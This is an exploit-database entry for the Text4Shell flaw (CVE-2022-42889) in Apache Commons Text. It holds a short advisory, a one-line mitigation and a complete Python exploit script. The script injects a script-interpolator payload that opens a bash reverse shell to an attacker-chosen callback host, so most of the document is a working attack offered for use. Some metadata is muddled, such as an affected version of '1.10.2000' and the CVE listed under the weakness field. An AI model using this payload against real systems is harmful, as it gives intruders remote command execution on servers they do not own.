Apache Commons Text 1.10.0 - Remote Code Execution (Text4Shell - POST-based)

vendor:

Apache Commons Text

by:

Arjun Chaudhary

6.1

CVSS

HIGH

Remote Code Execution (RCE)

RCE

CWE

Product Name: Apache Commons Text

Affected Version From: Less than 1.10.0

Affected Version To: 1.10.2000

Patch Exists: YES

Related CWE: CVE-2022-42889

CPE: a:apache:commons_text

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 20.04

2025

Apache Commons Text 1.10.0 – Remote Code Execution (Text4Shell – POST-based)

The exploit allows remote code execution in Apache Commons Text version less than 1.10.0 by sending a malicious payload via a POST request. This exploit uses a script interpolator to execute arbitrary commands on the target system.

Mitigation:

Upgrade to Apache Commons Text version 1.10.0 or newer to prevent this vulnerability. Additionally, input validation and sanitization should be implemented to filter out potentially malicious payloads.

Source

Exploit-DB raw data:

# Exploit Title: Apache Commons Text  1.10.0 - Remote Code Execution
(Text4Shell - POST-based)
# Date: 2025-04-17
# Exploit Author: Arjun Chaudhary
# Vendor Homepage: https://commons.apache.org/proper/commons-text/
# Software Link:https://repo1.maven.org/maven2/org/apache/commons/commons-text/
# Version: Apache Commons Text < 1.10.0
# Tested on: Ubuntu 20.04 (Docker container), Java 11+, Apache Commons Text 1.9
# CVE: CVE-2022-42889
# Type: Remote Code Execution (RCE)
# Method: POST request, script interpolator
# Notes: This exploit demonstrates an RCE vector via POST data, differing
from common GET-based payloads.

#!/usr/bin/env python3

import urllib.parse
import http.client
import sys

def usage():
    print("Usage: python3 text4shell.py <target_ip> <callback_ip> <callback_port>")
    print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444")
    sys.exit(1)

if len(sys.argv) != 4:
    usage()

target_ip = sys.argv[1]
callback_ip = sys.argv[2]
callback_port = sys.argv[3]

raw_payload = (
    f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
    f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
)


encoded_payload = urllib.parse.quote(raw_payload)


path = f"/?data={encoded_payload}" # modify the parameter according to your target 

print(f"[!] Remember to modify the parameter according to your target")
print(f"[+] Target: http://{target_ip}{path}")
print(f"[+] Payload (decoded): {raw_payload}")


conn = http.client.HTTPConnection(target_ip, 80)
conn.request("POST", path, body="", headers={
    "Host": target_ip,
    "Content-Type": "application/json",
    "Content-Length": "0"
})
response = conn.getresponse()
print(f"[+] Response Status: {response.status}")
print(response.read().decode())
conn.close()